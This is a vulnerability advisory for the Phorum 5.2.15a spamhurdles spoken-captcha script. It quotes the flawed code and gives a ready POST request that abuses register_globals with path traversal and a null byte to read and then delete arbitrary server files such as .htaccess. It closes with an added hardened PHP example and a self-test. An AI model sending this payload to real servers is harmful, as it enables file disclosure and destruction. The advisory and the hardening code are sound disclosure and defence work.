
23.05.2010, 13:42
Phorum 5.2.15a File Disclosure + File Deletion Vulnerability
Phorum version 5.2.15a
File Disclosure + File Deletion
Vuln file: /mods/spamhurdles/captcha/spoken_captcha.php
PHP code:
/*...*/
global $PHORUM;
$conf = $PHORUM["mod_spamhurdles"];
if ($conf["spoken_captcha"] && file_exists($conf["flite_location"]) &&
    isset($PHORUM["SPAMHURDLES"]["captcha"]["spoken_text"]))
{
    /*...*/
    // The temp-file path is built from $PHORUM["cache"].
    $tmpfile = "{$PHORUM["cache"]}/spokencaptcha_{$key}.wav";
    /*...*/
    if (file_exists($tmpfile) and filesize($tmpfile) > 0) {
        header("Content-Type: audio/x-wav");
        header("Content-Disposition: attachment; filename=captchacode.wav");
        header("Content-Length: " . filesize($tmpfile));
        // The file is sent to the client and then deleted.
        readfile($tmpfile);
        unlink($tmpfile);
        exit(0);
/*...*/
Need: magic_quotes = Off && register_globals = On
Exploit:
Code:
POST http://[host]/[path]/mods/spamhurdles/captcha/spoken_captcha.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
PHORUM[mod_spamhurdles][spoken_captcha]=1&PHORUM[mod_spamhurdles][flite_location]=spoken_captcha.php&PHORUM[SPAMHURDLES][captcha][spoken_text]=1&PHORUM[cache]=../../../scripts/.htaccess%00
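A hardened counterpart to the pattern in the post above, as an added example that is not Phorum's code or the original poster's: it refuses direct requests so the configuration array cannot come from request variables, and it resolves the temp-file path before any read or delete. The constant APP_BOOTSTRAPPED, both function names, and the 32-hex-character key format are assumptions made for the example.

```php
<?php
// Added example, not Phorum code. APP_BOOTSTRAPPED and both function
// names are hypothetical.
// Guard 1: a library script must only run when included by the application,
// so its configuration array can never be seeded from request variables.
function require_bootstrap(): void
{
    if (!defined('APP_BOOTSTRAPPED')) {
        http_response_code(403);
        exit;
    }
}

// Guard 2: build the temp-file path from a fixed-format key and confirm the
// resolved file really lives in the cache directory before read/unlink.
function captcha_wav_path(string $cacheDir, string $key): ?string
{
    if (!preg_match('/\A[a-f0-9]{32}\z/', $key)) {
        return null;                       // key format is an assumption
    }
    if (strpos($cacheDir, "\0") !== false) {
        return null;                       // NUL would cut off the fixed suffix
    }
    $base = realpath($cacheDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    $real = realpath($base . DIRECTORY_SEPARATOR . "spokencaptcha_{$key}.wav");
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real === false || !is_file($real) || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo data: a throwaway cache directory with one captcha file.
define('APP_BOOTSTRAPPED', true);
require_bootstrap();
$dir = sys_get_temp_dir() . '/captcha_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
$key = str_repeat('a', 32);
file_put_contents("$dir/spokencaptcha_$key.wav", 'RIFF');
$ok  = captcha_wav_path($dir, $key);
$bad = captcha_wav_path("../../../scripts/.htaccess\0", $key); // cache value shape from the post
$trv = captcha_wav_path($dir, '../../etc/passwd');
echo ($ok !== null && $bad === null && $trv === null) ? "checks passed\n" : "checks FAILED\n";
unlink("$dir/spokencaptcha_$key.wav");
rmdir($dir);
```

register_globals and magic_quotes_gpc were both removed in PHP 5.4.0, but the direct-access guard still matters for any script that trusts a global it does not set itself.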